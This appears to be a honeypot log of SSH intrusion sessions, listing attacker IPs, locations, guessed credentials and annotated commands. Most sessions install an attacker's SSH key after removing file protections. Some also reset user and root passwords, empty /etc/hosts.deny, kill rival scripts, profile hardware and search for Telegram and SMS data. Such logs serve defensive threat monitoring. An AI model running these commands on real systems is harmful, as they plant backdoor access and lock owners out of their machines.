$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
🎭 eagle_root_13 (170.106.179.118) β€” Santa Clara, United States Β· 2 sessions Β· 4 cmds
2026-05-23 07:17 EDT Β· as aroot/aroot, ubuntu/999999
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
🎭 tea_root_3 (185.230.219.29) β€” Worcester, United Kingdom Β· 3 sessions Β· 6 cmds
2026-05-28 09:35 EDT Β· as deploy/deploy1234, netflow/netflow2025, yash/yash
file attribute tampering β†’ SSH key persistence (repeated file attribute tampering 3x)
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
🎭 rogue_root_56 (43.243.142.42) β€” Jakarta, Indonesia Β· 7 sessions Β· 84 cmds
2026-05-14 06:52 EDT Β· as deploy/deploy1234, linux/linux123, netflow/netflow2025
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—7 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—7 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—4 // CPU profiling
$ echo -e "linux123\nxi7pmyWOZLdL\nxi7pmyWOZLdL"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "linux123\nxi7pmyWOZLdL\nxi7pmyWOZLdL\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—4 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—4
$ ls -lh $(which ls) Γ—4
$ which ls Γ—4
$ crontab -l Γ—4 // persistence setup
$ w Γ—4 // logged-in users check
$ uname -m Γ—4
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—4 // CPU profiling
$ top Γ—4 // process monitoring
$ uname Γ—4 // OS identification
$ uname -a Γ—4 // OS/kernel identification
$ whoami Γ—4 // privilege check
$ lscpu | grep Model Γ—4
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—4
$ echo "root:yKZ6zrYGdsGx"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ echo "root:v6ng4Xk7ut6U"|chpasswd|bash
$ echo -e "Kermit123@\njw7QKjkHUTJZ\njw7QKjkHUTJZ"|passwd|bash
$ echo "Kermit123@\njw7QKjkHUTJZ\njw7QKjkHUTJZ\n"|passwd
🎭 wraith_root_49 (156.245.246.50) β€” Hong Kong, Hong Kong Β· 1 session Β· 2 cmds
2026-05-28 09:55 EDT Β· as ubuntu/999999
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 wraith_root_50 (43.160.200.19) β€” Singapore, Singapore Β· 3 sessions Β· 6 cmds
2026-05-28 09:35 EDT Β· as deploy/deploy1234, netflow/netflow2025, yash/yash
file attribute tampering β†’ SSH key persistence (repeated file attribute tampering 3x)
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
🎭 spice_root_6 (13.71.92.229) β€” Chennai, India Β· 3 sessions Β· 6 cmds
2026-05-28 09:34 EDT Β· as deploy/deploy1234, netflow/netflow2025, yash/yash
file attribute tampering β†’ SSH key persistence (repeated file attribute tampering 3x)
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
🎭 clog_root_4 (20.224.168.82) β€” Amsterdam, Netherlands Β· 1 session Β· 2 cmds
2026-05-28 09:29 EDT Β· as yash/yash
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 shadow_9 (124.121.31.236) β€” Pak Kret, Thailand Β· 1 session Β· 2 cmds
2026-05-28 09:25 EDT Β· as deploy/deploy1234
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 ghost_root_68 (136.228.161.66) β€” Yangon, Myanmar Β· 2 sessions Β· 4 cmds
2026-05-28 07:50 EDT Β· as john/123, student/12345
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
🎭 shadow_root_46 (81.62.135.233) β€” Reinach, Switzerland Β· 2 sessions Β· 4 cmds
2026-05-28 07:55 EDT Β· as john/123, student/12345
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
🎭 shadow_root_47 (156.245.145.111) β€” Singapore, Singapore Β· 2 sessions Β· 4 cmds
2026-05-28 07:54 EDT Β· as john/123, student/12345
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
🎭 abba_root_3 (84.217.31.54) β€” Huskvarna, Sweden Β· 1 session Β· 9 cmds
2026-05-28 07:25 EDT Β· as root/12345
file attribute tampering β†’ SSH key persistence
$ /ip cloud print
$ ifconfig // network mapping
$ uname -a // OS/kernel identification
$ cat /proc/cpuinfo // CPU profiling
$ ps | grep '[Mm]iner'
$ ps -ef | grep '[Mm]iner'
$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
$ locate D877F783D5D3EF8Cs
$ echo Hi | cat -n
🎭 dragon_root_13 (180.213.44.242) β€” Youyilu, China Β· 1 session Β· 2 cmds
2026-05-28 06:21 EDT Β· as admin/fjbdfdjkdsfs541544
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 kimchi_root_9 (182.217.16.126) β€” Gangseo-gu, South Korea Β· 2 sessions Β· 40 cmds
2026-05-10 11:59 EDT Β· as admin/fjbdfdjkdsfs541544, ubuntu/guest
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "fjbdfdjkdsfs541544\nGCr69dB8rLti\nGCr69dB8rLti"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "fjbdfdjkdsfs541544\nGCr69dB8rLti\nGCr69dB8rLti\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "guest\nrrZHhew0I2sq\nrrZHhew0I2sq"|passwd|bash
$ echo "guest\nrrZHhew0I2sq\nrrZHhew0I2sq\n"|passwd
🎭 dragon_root_14 (223.221.36.42) β€” Xining, China Β· 1 session Β· 20 cmds
2026-05-28 06:00 EDT Β· as admin/fjbdfdjkdsfs541544
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "fjbdfdjkdsfs541544\ndQjL0PCI8uir\ndQjL0PCI8uir"|passwd|bash
$ Enter new UNIX password:
$ echo "fjbdfdjkdsfs541544\ndQjL0PCI8uir\ndQjL0PCI8uir\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 bear_root_3 (94.180.250.11) β€” Kazan', Russia Β· 3 sessions Β· 59 cmds
2026-05-22 04:37 EDT Β· as admin/fjbdfdjkdsfs541544, jeff/jeff, root/1qaz1QAZ
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "fjbdfdjkdsfs541544\n0kQu7AbD9YHQ\n0kQu7AbD9YHQ"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "fjbdfdjkdsfs541544\n0kQu7AbD9YHQ\n0kQu7AbD9YHQ\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo "root:4IAcTrA1zs1G"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ echo -e "jeff\nDbekkN9bAwiN\nDbekkN9bAwiN"|passwd|bash
$ echo "jeff\nDbekkN9bAwiN\nDbekkN9bAwiN\n"|passwd
🎭 shadow_root_48 (103.237.144.204) β€” QuαΊ­n ChΓ­n, Vietnam Β· 2 sessions Β· 40 cmds
2026-05-08 07:49 EDT Β· as admin/95217, admin/fjbdfdjkdsfs541544
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "fjbdfdjkdsfs541544\nCWMhEIXzJMRF\nCWMhEIXzJMRF"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "fjbdfdjkdsfs541544\nCWMhEIXzJMRF\nCWMhEIXzJMRF\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "95217\nxfVtAASPNWUX\nxfVtAASPNWUX"|passwd|bash
$ echo "95217\nxfVtAASPNWUX\nxfVtAASPNWUX\n"|passwd
🎭 wraith_root_51 (45.129.185.7) β€” Gavar Municipality, Armenia Β· 3 sessions Β· 58 cmds
2026-05-13 11:09 EDT Β· as admin/fjbdfdjkdsfs541544, root/a1q2w3e4, root/mrcool
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "fjbdfdjkdsfs541544\nzjaq8ejZ2Nh4\nzjaq8ejZ2Nh4"|passwd|bash
$ Enter new UNIX password:
$ echo "fjbdfdjkdsfs541544\nzjaq8ejZ2Nh4\nzjaq8ejZ2Nh4\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo "root:594SOY23uIfy"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ echo "root:4zIsiKHDG5mF"|chpasswd|bash
🎭 specter_root_13 (85.240.193.104) β€” Santo EstΓͺvΓ£o, Portugal Β· 4 sessions Β· 80 cmds
2026-05-08 23:33 EDT Β· as admin/fjbdfdjkdsfs541544, nokia/nokia123, tomcat/123456
file attribute tampering β†’ SSH key persistence
